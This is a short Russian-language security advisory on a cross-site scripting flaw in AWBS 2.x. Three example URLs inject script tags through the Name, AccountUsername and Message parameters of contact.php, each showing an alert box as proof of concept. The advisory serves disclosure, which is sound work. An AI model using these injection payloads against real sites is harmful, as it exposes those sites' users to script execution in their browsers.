Программа: AWBS 2.x

Уязвимость позволяет удаленному
пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной
обработки входных данных в параметрах "Name"
и "AccountUsername" в сценарии contact.php.
Удаленный пользователь может с помощью
специально сформированного запроса
выполнить произвольный код сценария в
браузере жертвы в контексте безопасности
уязвимого сайта.

Пример:

http://[site adres]/contact.php?action=submit&Name=’><script>alert(‘XSS
Vulnerability’)%3B</script>&EmailAddress= 1&AccountUsername=1&Message=1

http://[site adres]/contact.php?action=submit&Name= 1&EmailAddress=1&AccountUsername=’><script>alert(‘XSS
Vulnerability’)%3B</script>&Message=1

http://[site adres]/action=submit&Name=1&EmailAddress= 1&AccountUsername=1&Message=</textarea>
<script>alert(‘XSS Vulnerability’)%3B</script>



Оставить мнение